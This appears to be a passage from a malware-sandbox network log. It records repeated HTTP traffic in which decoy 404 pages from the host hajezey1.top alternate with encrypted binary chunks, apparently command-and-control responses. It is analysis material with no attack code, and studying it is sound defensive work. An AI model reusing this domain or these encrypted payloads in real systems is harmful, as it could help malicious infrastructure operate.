30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 1d 16 4d aa 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 07 74 d2 87 9a 87 cd 2b 80 78 51 a1 a2 8f 3c 65 dd 1c e0 32 02 50 08 a8 da e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1d 27 f4 d2 af 34 91 b4 b9 21 80 20 59 55 11 5c 92 86 64 ab 49 11 80 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 85 92 c9 8a 5c d8 06 0e 45 27 11 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 9c 48 6b 0e e1 a2 22 48 f2 d0 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 4f 5a 96 da 19 d1 3a 2d ca 41 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 8d 7d 14 2c d0 e8 b1 14 1d 73 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 02 43 64 cd 25 5c 8d b7 d7 21 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 6a b7 be 34 56 9b 46 76 99 86 11 00 83 32 42 ea 6f cf ae 04 5d 94 36 e1 48 50 67 35 50 b8 81 be f0 80 de 5b 46 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 
57 25 f5 b8 d0 a7 85 62 4a 52 7d 54 7a 08 6c 39 c0 5e f3 5c 19 6d 63 95 be 07 3d da 9a 3e 05 22 7d e6 b2 68 60 bd 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 47 4e a1 21 84 88 4b 2e 69 81 77 af dd c6 83 41 df 30 ae b8 e8 21 10 a0 57 6e 61 87 bd 77 6a 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 52 d3 e4 9e 4e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 3d 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 9b 09 09 a8 00 13 30 7b 88 cc c9 e1 a3 c3 e5 0f 25 93 23 c4 a9 d7 cf 8e 3d 39 dc 46 ba 58 dc be b0 98 3f d8 94 eb 53 43 a1 0c 97 e4 6e 76 f9 14 34 0b 64 82 b2 64 4f 55 e0 ca 5e c3 bd c0 88 0b 54 d9 1d 69 7a de ff 3d e1 03 70 2e 1f f4 d4 6a a9 a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 42 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 76 92 71 06 45 a6 3e 11 dc a4 a3 a6 7e d8 6c a2 05 09 17 f6 cb ee 72 76 25 3f 50 19 01 bf 01 ea 53 01 b3 15 20 f5 3b e2 2a c2 d5 71 18 46 9b 3d f9 5c 40 8f ba f1 80 fe 05 b5 79 9e 10 b0 fb 14 9e 76 e9 bb 27 58 a4 0c 87 05 f0 bf 5f 60 08 d9 eb a8 e1 48 a8 03 88 31 7c 3b 66 ab 4b 11 c0 4d 08 0e 77 13 9e 09 5f 47 0b 5d 16 75 32 39 c5 f7 15 67 aa cf d0 c0 78 9e 0d a3 75 c1 96 52 88 36 19 ff bd 88 13 d8 06 0e 25 4f 12 7d 6f ed e0 04 89 19 d7 57 80 90 30 89 ec f4 4a 6b b6 f0 a2 22 4d 32 d3 49 ad ff bc ff 1a fd f4 3f f4 6f d3 7c cb c6 a8 cc 4e 4d b3 0b 97 2a 60 55 59 ad 30 fb 83 3b 3b ca c3 f3 b2 ec 92 90 1f 1c 57 fe 87 7e 0c 35 8a 3d 40 7f d0 56 81 96 9b 97 9e 70 9f 8a a2 25 44 5a c9 b2 cb 99 64 21 68 85 d2 f8 b8 56 b0 40 f6 0a bf 8b 71 91 e0 55 d0 66 21 df 76 79 27 e4 21 94 42 22 d1 3a 0d b4 43 06 1e 27 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 f0 d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 91 3d 4b 04 78 2d 7f 14 2c d6 e8 b1 14 73 71 10 22 07 4a 86 97 31 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 70 9c 82 97 d1 d6 4a 13 a7 e9 4d 51 c2 41 64 e3 53 39 f5 c3 a3 23 0c 28 df 52 d2 eb f9 23 19 9d 8c 3f 70 36 45 ae e4 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 f8 62 47 22 0b 85 d4 ca 55 56 9b 46 76 1d f3 13 02 63 34 42 c2 0c ce ae 70 85 96 36 e2 48 50 67 74 50 b8 87 f6 bc 81 de fb 6e 6a f6 e1 7b 54 3c 81 d2 be 95 df e2 63 10 ec 88 c0 5d 14 66 f2 e6 2f 59 47 ef bf 8b 4f dc ea 90 39 02 97 ab a4 
57 65 f5 b8 90 c4 f7 07 26 67 1e 54 7a 54 4f 38 c0 5e 33 25 1b 6e 47 94 be 07 13 de 9a 3e 05 22 7d e6 b2 68 60 b9 10 31 eb 8d fc 25 57 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af dd c6 83 41 67 30 ae b8 e8 21 10 a0 57 6e 61 87 bd 77 6a 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 52 d3 e4 9e 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 9e 55 06 63 17 e5 ff dc fc be 1e b4 53 d9 63 ba 53 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OUcScS0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 